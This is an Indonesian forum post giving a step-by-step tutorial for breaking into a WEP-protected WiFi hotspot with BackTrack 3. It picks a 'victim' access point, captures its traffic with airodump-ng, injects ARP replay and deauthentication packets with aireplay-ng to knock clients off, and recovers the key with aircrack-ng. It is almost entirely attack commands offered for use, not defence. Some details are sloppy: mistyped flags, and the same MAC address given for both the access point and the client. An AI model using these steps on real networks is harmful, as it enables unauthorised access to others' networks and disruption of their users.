MENJEBOL PASSWOR WEP KEY WIFI ( WERLESS HOSTSPOT YANG TERPROTECK ) DENGAN LIVE USB LINUX BACKTRACK 3
1.Gunakan CD BackTrack 3 yang telah kita buat live usb
2.Booting live usb linux backtrack 3 dari usb
3.Masukan username root dan password toor
4.Untuk menampilakn GUI ( Grafik KDE ) Ketik root@bt3# startx
5.Klik conguoer untuk setting wifi card anda klik setting untuk setting wifi anda
6.Setelah selesai setting wifi anda , biasa nya kalau anda mengunakan wifi usb Ralink sudah terditek otomatis oleh backtrack3
7.Lalu masuk ke konsule ketik root@bt3# airmon-ng start rausb0 ( rausb0 adalah driver wifi anda )
8.Trus ketik root@bt3# kismet dan tekan enter
http://3.bp.blogspot.com/_B_uHIq-j_tE/SfLLFMh2sxI/AAAAAAAAAIM/DfEciCl521g/s320/kismet.png9.Secara otomatis Kismet akan me-load, meng-update dan menampilkan semua akses point yang berada di daerah jaringan tersebut. Setelah itu kita pilih calon target / korban.
10.Kedua command ini berguna untuk mengaktifkan mode monitoring dan injection pada wireless adapter anda. Kemudian lanjutkan dengan monitoring jaringan wireless dengan mengetikkan command berikut : root@bt3 # airodump-ng rausb0
11.Akan tampil seluruh jaringan wireless yang terdeteksi seperti diatas. Tampak terlihat Access Point YDS70275857 diproteksi dengan WEP Encryption. itulah korban kita. AP YDS70275857 diset pada Channel 6 dan memiliki BSSID 00:02:6F:49:15:CF . Sekarang saatnya melakukan penyerangan.Buka Console baru dan ketikkan : root@bt3# airodump-ng --channel 6 --bssid 00:02:6F:49:15:CF -w hasil rausb0
12.Perintah diatas akan mengumpulkan paket data yang dibutuhan untuk proses Cracking.
13.Selanjutnya lakukan injeksi paket pada Client yang terkoneksi pada AP untuk mendapatkan paket ARP lebih cepat. Bukalah lagi Console baru tanpa menutup console yang sebelumnya dan ketik :root@bt3 # aireplay-ng –arpreplay -b 00:02:6F:49:15:CF -h 00:02:6F:49:15:CF rausb0
14.Client yang diserang ini memiliki Mac address 00:02:6F:49:15:CF
15.Tidak sabar menunggu ? Untuk mempercepat lagi datangnya ARP , maka kita dapat melakukan serangan Deauthentication untuk memutuskan hubungan Client ke AP sehingga ARP yang biasanya didapat saat awal koneksi client dapat lebih cepat didapat. Bukalah console baru sekali lagi dan ketikkan :root@bt3 # aireplay-ng –deauth 5 -c 00:02:6F:49:15:CF -a 00:02:6F:49:15:CF rausb0
16.Hasil dari ketiga perintah ini dapat anda lihat pada screenshot diatas ini :
17.Sampai sejauh ini anda telah melakukan pengumpulan paket yang dibutuhkan untuk menjebol WEP Keys. Langkah terakhir yang harus anda lakukan adalah buka console baru lagi dan ketikkan perintah berikut :root@bt3 # aircrack-ng hasil*.cap
18.atau apabila anda memiliki aircrack versi terbaru anda dapat juga mengetikkan perintah seperti berikut : root@bt3 # aircrack-ptw hasil-01.cap
19.Dan tunggulah beberapa menit hingga anda mendapatkan key tersebut, akhirnya saya berhasil mendapatkan password WEP Key nya hanya melakukannya dalam waktu 30 Menit dengan perintah aircrack-ptw hasil-01.cap .
sundul gan